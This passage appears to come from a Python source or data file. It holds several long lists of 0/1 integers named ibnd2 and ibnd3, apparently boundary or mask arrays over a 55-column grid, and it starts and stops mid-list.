0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
ibnd2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
ibnd3 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0,
